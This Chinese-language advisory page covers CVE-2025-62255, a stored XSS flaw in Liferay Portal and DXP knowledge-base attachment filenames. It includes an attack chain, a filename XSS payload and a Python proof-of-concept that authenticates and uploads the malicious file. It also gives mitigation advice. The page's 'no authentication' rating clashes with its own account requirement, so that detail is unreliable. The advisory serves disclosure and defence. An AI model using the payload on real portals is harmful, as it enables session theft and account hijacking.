CVE-2025-62255 Liferay Portal知识库文章附件文件名存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62255

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal, Liferay DXP

漏洞概述

CVE-2025-62255是Liferay Portal和Liferay DXP中存在的一个存储型跨站脚本（XSS）漏洞。该漏洞位于编辑知识库（Knowledge Base）文章页面的附件文件名处理功能中。攻击者可以通过在上传附件时注入精心构造的恶意Payload到文件名中，当其他用户访问或查看该知识库文章时，恶意脚本代码将在受害者浏览器中执行。漏洞影响Liferay Portal 7.4.0至7.4.3.101版本以及更早的不受支持版本，同时也影响Liferay DXP 2023.Q3.1至2023.Q3.5版本和7.4 GA至update 92版本。由于漏洞利用需要用户交互（UI:R），攻击者需要诱导受害者访问包含恶意附件文件名的页面才能触发XSS执行。CVSS评分为6.1，属于中等严重程度，主要风险在于窃取用户会话Cookie、劫持用户账户或进行钓鱼攻击。

技术细节

该存储型XSS漏洞源于Liferay Portal在处理知识库文章附件文件名时缺乏充分的输入验证和输出编码。当用户编辑知识库文章并上传附件时，系统直接将文件名存储到数据库中而未对特殊字符进行HTML实体编码。随后，当其他用户查看该文章或通过列表展示附件时，浏览器会直接解析并执行文件名中嵌入的JavaScript代码。攻击者可以利用文件上传功能，上传名为<img src=x onerror=alert(document.cookie)>或类似构造的文件，诱导其他用户在访问页面时执行任意JavaScript脚本。由于漏洞位于知识库文章编辑功能中，任何具有文章编辑权限的用户都可能成为攻击者。修复方案需要在文件上传时对文件名进行严格的输入验证，并在所有输出点使用适当的HTML编码函数对用户输入进行转义。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标Liferay Portal版本，确认其为7.4.0-7.4.3.101或DXP 2023.Q3.1-2023.Q3.5版本，并定位知识库文章编辑功能

STEP 2

初始访问

攻击者获取Liferay Portal账户登录凭证，可以是普通用户账户（具有文章编辑权限）

STEP 3

恶意Payload植入

攻击者在编辑知识库文章时，上传附件并将文件名设置为包含XSS Payload的内容，如<img src=x onerror=alert(document.cookie)>.jpg

STEP 4

数据持久化

恶意文件名被存储到数据库中，由于缺乏输入验证，Payload以原始形式保存

STEP 5

触发阶段

当其他用户访问该知识库文章页面时，浏览器解析页面时直接显示附件文件名，嵌入的JavaScript代码被执行

STEP 6

恶意脚本执行

受害者的浏览器执行攻击者注入的JavaScript代码，可能窃取Cookie、会话令牌或执行其他恶意操作

STEP 7

账户劫持

攻击者利用窃取的认证信息劫持受害者账户，进一步扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62255 PoC - Liferay Portal Stored XSS in Knowledge Base Attachment Filename # This PoC demonstrates the stored XSS vulnerability via attachment filename injection import requests import json # Configuration target_url = "https://target-liferay-portal.com" cve_id = "CVE-2025-62255" # XSS Payload for attachment filename # The payload uses an image tag with onerror handler to execute JavaScript xss_payload = '<img src=x onerror=alert(document.cookie)>' # Authentication credentials auth_creds = { "username": "[email protected]", "password": "password123" } def exploit_stored_xss(): """ Exploit stored XSS in Liferay Knowledge Base article attachment filename Steps: 1. Authenticate to Liferay Portal 2. Create or access a Knowledge Base article 3. Upload attachment with malicious filename 4. The XSS will trigger when other users view the article """ # Step 1: Login to Liferay Portal login_url = f"{target_url}/c/portal/login" session = requests.Session() login_data = { "login": auth_creds["username"], "password": auth_creds["password"], "redirect": "/" } response = session.post(login_url, data=login_data) if response.status_code != 200: print(f"[-] Login failed") return False print("[+] Successfully authenticated") # Step 2: Navigate to Knowledge Base article editor kb_editor_url = f"{target_url}/group/control_panel/manage?p_p_id=101_INSTANCE_kb_article" # Step 3: Upload attachment with XSS payload in filename upload_url = f"{target_url}/api/jsonws/dlapp/add-file-entry" files = { "file": (f"{xss_payload}.jpg", b"fake_image_data", "image/jpeg") } upload_data = { "repositoryId": "10181", "folderId": "0", "sourceFileName": f"{xss_payload}.jpg", # Malicious filename "mimeType": "image/jpeg", "title": f"{xss_payload}.jpg", "description": "Malicious attachment for XSS testing" } response = session.post(upload_url, data=upload_data, files=files) if response.status_code == 200: print(f"[+] XSS payload uploaded successfully") print(f"[+] Payload: {xss_payload}") print(f"[+] The XSS will execute when users view the Knowledge Base article") return True else: print(f"[-] Upload failed: {response.status_code}") return False def verify_vulnerability(): """ Verify the XSS vulnerability exists by checking the response """ print(f"\n[*] Verifying {cve_id}...") print(f"[*] Target: {target_url}") print(f"[*] Vulnerability Type: Stored XSS in Knowledge Base Attachment Filename") print(f"[*] Affected Versions: Liferay Portal 7.4.0-7.4.3.101, Liferay DXP 2023.Q3.1-2023.Q3.5") if __name__ == "__main__": verify_vulnerability() # Note: Run exploit_stored_xss() only in authorized security testing # exploit_stored_xss()

影响范围

Liferay Portal 7.4.0

Liferay Portal 7.4.1

Liferay Portal 7.4.2

Liferay Portal 7.4.3

Liferay Portal 7.4.3.101

Liferay DXP 2023.Q3.1

Liferay DXP 2023.Q3.2

Liferay DXP 2023.Q3.3

Liferay DXP 2023.Q3.4

Liferay DXP 2023.Q3.5

Liferay DXP 7.4 GA

Liferay DXP 7.4 GA Update 1-92

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制知识库文章编辑权限，仅允许受信任的管理员用户访问；2) 在Web应用防火墙（WAF）层面配置规则，检测并拦截包含XSS特征的请求参数；3) 启用浏览器的XSS过滤器功能；4) 实施严格的输入验证和白名单机制；5) 监控日志中的异常请求模式。建议尽快应用官方发布的安全更新以彻底修复漏洞。